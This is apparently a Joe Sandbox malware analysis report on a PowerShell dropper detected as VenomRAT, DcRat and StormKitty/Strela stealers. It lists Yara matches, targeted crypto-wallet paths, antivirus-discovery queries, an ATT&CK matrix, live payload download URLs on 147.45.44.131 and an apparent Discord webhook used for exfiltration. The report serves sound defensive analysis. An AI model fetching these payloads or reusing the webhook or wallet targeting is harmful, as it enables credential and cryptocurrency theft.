Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020FCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_0020FCE5

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020C9DB LookupAccountNameW,GetLastError,malloc,LookupAccountNameW,GetLastError,free,

3_2_0020C9DB

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_001FB4F0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,GetVersionExW,#1202,#538,#800,#6112,#2613,#384,#2089,#1197,#520,#986,#4604,#1197,#5977,

3_2_001FB4F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected VenomRAT

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: RegAsm.exe, 0000000B.00000002.4134666435.0000000006330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected DcRat

Source: Yara match

File source: 0000000B.00000002.4119044743.0000000003009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected StormKitty Stealer

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000000.00000002.1726404316.00007FFD9BA60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Source: Yara match	File source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected DcRat

Source: Yara match

File source: 0000000B.00000002.4119044743.0000000003009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected StormKitty Stealer

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_00204899 #1662,#540,lstrcpyW,CreateBindCtx,MkParseDisplayName,#2644,#2810,#800,lstrlenW,#2810,#2644,#800,

3_2_00204899

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 Scheduled Task/Job	312 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	121 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	2 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Security Software Discovery	SSH	Keylogging	21 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	151 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
wrcaf.ps1	13%	ReversingLabs	Script-PowerShell.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll	100%	Joe Sandbox ML
C:\Windows\Temp\Package.exe	0%	ReversingLabs
C:\Windows\Temp\iviewers.dll	3%	ReversingLabs

Source	Detection	Scanner	Label
http://147.45.44.131/infopage/file.exe	0%	Avira URL Cloud	safe
http://147.45.4486O	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/ersyb.exe0	0%	Avira URL Cloud	safe
http://147.45.448	0%	Avira URL Cloud	safe
http://147.45.44	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/rwvg1.exe	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/iviewers.dll	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/iubn.ps1	100%	Avira URL Cloud	malware
http://147.45.44.131/infopage/ersyb.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/file.exe	true	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/iubn.ps1	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.131/infopage/ersyb.exe	powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1724491354.0000000004E72000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722443705.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722129612.0000000004E82000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722303868.0000000004E82000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1722414106.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, envi5f4j.dll.7.dr, envi5f4j.0.cs.6.dr	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1713822398.000001D326EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713822398.000001D326FE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/ersyb.exe0	csc.exe, 00000007.00000003.1723079852.0000000006B01000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000000.00000002.1691330350.000001D317A62000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.4486O	powershell.exe, 00000006.00000002.1753216083.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/v6/users/	RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.14.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_seeaCould	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/iviewers.dll	powershell.exe, 00000000.00000002.1691330350.000001D318462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691330350.000001D318963000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://james.newtonking.com/projects/json	RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.newtonsoft.com/jsonschema	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://147.45.44.131	powershell.exe, 00000000.00000002.1691330350.000001D318669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691330350.000001D318963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004A9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.00000000048E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.448	powershell.exe, 00000006.00000002.1753216083.0000000004A9E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/rwvg1.exe	powershell.exe, 00000006.00000002.1753216083.00000000049DC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stackoverflow.com/q/14436606/23354cIt	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://ipinfo.io/ip	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000006.00000002.1753216083.0000000004791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1713822398.000001D326EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713822398.000001D326FE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1691330350.000001D316E31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_see	powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1691330350.000001D316E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1753216083.0000000004791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44	powershell.exe, 00000000.00000002.1691330350.000001D318462000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	true
157.20.182.177	unknown	unknown		24297	FCNUniversityPublicCorporationOsakaJP	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583430
Start date and time:	2025-01-02 19:12:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wrcaf.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winPS1@22/23@0/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 103 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.89.179.12, 40.126.32.133, 4.245.163.56, 13.107.246.45
